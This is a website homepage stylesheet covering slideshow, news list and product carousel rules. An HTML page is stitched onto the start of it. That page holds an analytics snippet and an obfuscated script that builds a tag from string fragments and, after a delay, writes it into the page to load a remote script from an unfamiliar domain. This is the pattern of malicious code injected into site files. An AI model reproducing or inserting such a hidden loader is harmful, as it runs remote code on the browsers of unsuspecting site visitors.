<html>
<head>
<meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body>
<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?e9581d4232246a6b4a91cc5b91ff4772";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>
<script type="text/javascript"> 
setTimeout(function() {var xx="<";xx=xx+"script";xx=xx+" type='";xx=xx+"text";xx=xx+"/javascript'";xx=xx+" src='";xx=xx+"htt";xx=xx+"ps://s.";xx=xx+"36yh.";xx=xx+"com/";xx=xx+"vns.js'>";xx=xx+"></";xx=xx+"script>";document.write(xx);}, 1000);
</script>
</body>
</html>@charset "utf-8";
/* CSS Document */
@import url(reset.css);

.homekv{
	width:1920px; height:400px; position:relative; margin-left:-960px; top:0; left:50%; z-index:2; overflow:hidden;
}
#slides li{
	float:left; width:1920px;height:400px;
}
#slides li img{
	display: block;
}

#slidesdot{
	width:1000px; height:12px; position:absolute; left:0; bottom:15px; z-index:50;
}
#slidesdot li{
	float:left; width:12px; height:12px; margin:0 3px;
}
#slidesdot li a{
	width:12px; height:12px; display:inline-block; overflow:hidden;
	background: url(../images/kv_dot.png) no-repeat;
}
#slidesdot li.act a{
	background: url(../images/kv_dot_red.png) no-repeat;
}

.home-m{
	margin-top:0; overflow: auto;
}

.page-h2{
	height: 38px; padding: 0 20px; background-color: #f7f7f7;
}
.page-h2 dt{
	float: left; line-height: 38px;
}
.page-h2 dt span{
	padding: 0 10px; display: block;
	font-size: 14px; color: #fff;
	background:url(../images/home1.png) repeat-x;
}
.page-h2 dd{
	float: right;
}
.page-h2 dd i{
	margin: 0 10px;
}
.page-h2 dd a.more{
	width:21px; height: 21px; margin-top: 8px; display: block; text-indent: -9999px;
	background:url(../images/icon/ico6.png) repeat-x;
}

.info-m{
	float: left; width: 330px;
}
.info-top{
	margin-top:15px; overflow:auto;
}
.info-top dt{
	float:left; width:145px; margin-right:10px;
}
.info-top dt img{
	width:145px; height:110px;
}
.info-top dd{
	float:left; width:175px;
}
.info-top-title{
	height:36px; line-height:18px; font-weight:bold; overflow:hidden;
}
.info-top-intro{
	line-height:18px;
}
.info-top-intro a,
.info-top-intro a:link,
.info-top-intro a:hover{
	font-weight:bold; color:#006acc;
}

.info-list{
	margin-top: 10px; overflow: auto;
}
.info-list dl{
	height: 28px; line-height: 28px; border-bottom: 1px dashed #a2a2a2;
}
.info-list dt{
	float: left; width: 240px;
	white-space:nowrap; overflow:hidden; text-overflow:ellipsis;
}
.info-list dd{
	float: right; width: 80px; text-align: right; color: #909090;
}
.project-m{
	float: left; width: 320px; margin: 0 20px;
}
.project{
	overflow:auto;
}
.project li{
	float:left; width:130px; margin-left:20px; margin-top:7px;
}
.project li img{
	width:130px; height:97px; display:block;
}
.notice-customer{
	float: left; width: 310px;
}
.notice{
	height:60px; line-height:20px; margin:15px 0;
	font-size:14px;
}
.customer{
	height:174px; margin-top:10px; overflow:hidden;
}
.customer li{
	height: 28px; line-height: 28px; border-bottom: 1px dashed #a2a2a2;
}

#product-box{
	position:relative; z-index:20; margin-top: 15px; overflow:hidden;
}
.lb_cur_left,
.lb_cur_right {
	float:left;width:28px;height:52px;cursor:pointer;position:absolute;z-index:20;top:31px;overflow:hidden;
}
.lb_cur_left{
	left:10px;
	background:url(../images/home3-1.png) no-repeat;
}
.lb_cur_right{
	right:10px;
	background:url(../images/home3-2.png) no-repeat;
}
.lb_cur_left_gray{
	cursor:default; background:url(../images/home3-1-gray.png) no-repeat;
}
.lb_cur_right_gray{
	cursor:default; background:url(../images/home3-2-gray.png) no-repeat;
}

#product-box{
	width:1000px;height:150px;position:relative;
}
#product-list{position:relative;}
#product-inner{float:left; width:880px; height:150px; left:60px; position:absolute; z-index:10; overflow:hidden;}
#product-list{width:5460px;height:150px;}
#product-list li{
	float:left; width:152px; height:150px; margin-right:30px; overflow:hidden;
}
#product-list li span{
	line-height:30px; display:block; text-align:center; font-size:14px;
}
#product-list li img{
	width:150px; height:112px; display: block; border: 1px solid #e4e4e4;
}